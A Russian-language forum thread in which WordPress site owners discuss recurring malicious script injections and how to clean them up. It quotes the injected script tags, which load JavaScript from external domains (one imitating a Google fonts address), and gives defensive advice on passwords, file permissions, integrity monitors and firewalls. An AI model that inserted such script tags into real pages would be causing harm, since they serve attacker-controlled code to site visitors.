Айболитом проверил — результатов 0
Если 0 — признак того, что что-то не так проверили.
Айболит не выдаёт 0 — всегда есть как минимум подозрения :).
В параноидальном режиме?
Везде эта фигня в записях.
В контенте?
Редко, но встречалось — вирус (шелл) был в базе.
короче, помогло удаление плагина Secondary Title. Больше ничего подобного 4 дня не было
если там был зашит вирус — то помогло.
так как сам по себе плагин вполне безобидный.
Это дырка в движке, именной в новых версиях движка… Мои сайты тоже зацепило, прописывается скрипт этот через базу данных, каким образом не понятно. Зацепило так же клиенские сайты, которые находятся на различных хостингах. Их ничего не объединяет, ни темы, ни плагины…
Прописывается следующее:
<script type=»text/javascript» src=»//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2″></script>
<script type=»text/javascript» src=»//wq4.ru/js.js»></script>
<script type=»text/javascript» src=»//shareup.ru/social.js»></script>
Уважаемые разработчики, решите проблему.
Если загуглить по адресу из вставки, можно увидеть сотни других сайтов, с такими же вставками…
Это дырка в движке, именной в новых версиях движка…
Пока нет подтверждений от секурных или ВПшных источников — это Ваши домыслы.
Их ничего не объединяет, ни темы, ни плагины…
Так уж и ничего… Темы-плагины могут быть старые/с помоек. Могут быть установлены внешние скрипты (счётчики, соц кнопки и тп.)…
И почему моих клиентов никого не зацепило?
Да, спору нет, это мои домыслы…
И почему моих клиентов никого не зацепило?
Повезло =) или еще не дошла волна. У меня код вчера появился, на клиентских сайтах правда не известно.
просто нормальные люди не ставят тем с помоек, ворованных плагинов и тд и тп. куда не посмотришь — то премиум-тема скачана с помойки, то плагин аля revolution slider с варезного сайта, то еще что.
и при этом никаких плагинов элементарной безопасности, которые бы мониторили изменения файлов на сервере.
Повезло =) или еще не дошла волна
Не думаю 🙂 Просто темы и плагины все правильные. На сайтах нет всяких сторонних сервисов, тизерок и пр лабуды.
Ну и конечно же обеспечение безопасности сайта и хостингов (не плагинами).
Короче, сегодня опять появилась эта дрянь. по поводу всякого мусора в плагинах и темах: тема у меня одна, с официального сайта вопрдпресс. плагины вообще по пальцам пересчитать можно и те тоже с оф. сайта. На сайтах ни плагины, ни темы не совпадают.
странно, что периодичность появления плавает от двух часов до недели
да какая теперь разница, официальные плагины и темы или нет?
в их файлы мог затесаться шелл — даже если вы дырявые плагины удалили, то шелл где-то все равно зарылся.
когда меня несколько лет назад взломали — залили шелл в папку wp-content/languages/ — я бы и не заметил никогда, если бы при скачке бэкапа на домашний комп касперский не стал орать.
теперь я использую WordPress File Monitor и всегда в курсе, если на сайте вдруг появляются несанкционированные файлы или изменяются вдруг уже существующие.
я к тому, что если вы заражены — удаление источника заражения не поможет.
периодичность появления плавает от двух часов до недели
Смените все пароли (админка, база, панель управления хостингом, фтп) и соль.
Установите на папку и все подпапки темы, которую вы используете, права доступа 0505, а на все файлы — 0404.
Установите контроль за измененными файлами. Чуть ниже советуют WordPress File Monitor — хороший плагин. Так же посоветую плагин Look-See Security Scanner — https://wordpress.org/plugins/look-see-security-scanner/ Он проверяет, не были ли изменены файлы движка относительно файлов из оригинального дистрибутива.
Установите какой-нибудь файервол, например, Simple Security Firewall — https://wordpress.org/plugins/wp-simple-firewall/.
Найдите в теме подключение вредоносного скрипта (ну где-то же он должен быть) — скорее всего это файлы functions.php, header.php, footer.php, htaccess, wp-config,php.
теперь я использую WordPress File Monitor
Он старый и всё-таки использует ядро. Рекомендую посмотреть на сторонние скрипты типа такого (в 6 посте ссылка на сайт).
Он старый и всё-таки использует ядро. Рекомендую посмотреть на сторонние скрипты типа такого (в 6 посте ссылка на сайт).
в таких вещах (когда кто-то что-то мониторит в файловой структуре) я консервативен и банально боюсь ставить незнакомые мне скрипты. а тут четко — поставил для каждого сайта отдельно, в каждом внес исключения, видно все в админке и на email. и что самое удобное — все это сканируется отдельно и не завешивает сайт. потому что если я буду проверять всю файловую структуру сервера с 40 сайтами — я его как минимум на несколько минут повешу намертво.
но по смыслу да, плагин сильно устарел.
но по смыслу да, плагин сильно устарел
Ну по поводу старости я бы не беспокоился — плагин сравнивает контрольные суммы файлов, и создает отчеты о своей работе, вот и все. Делает это исправно, в работу движка не вмешивается. Смысл что-то в нем обновлять, если он работает? Так что пользуйтесь без сомнений.
А вот по поводу использования сторонних скриптов, не проходящих через репозиторий WordPress, я бы сомневался.
Смысл что-то в нем обновлять, если он работает?
Что он уже долго не работает (после очередного обновления ВП) можно узнать, когда уже будет поздно. 😉
Кроме того плагин когда работает — он таки использует ядро. А работает он долго. Подобные скрипты итак нагружают хостера, а ещё и ВП использовать.
А вот по поводу использования сторонних скриптов, не проходящих через репозиторий WordPress, я бы сомневался.
Можно взять и посмотреть код 🙂
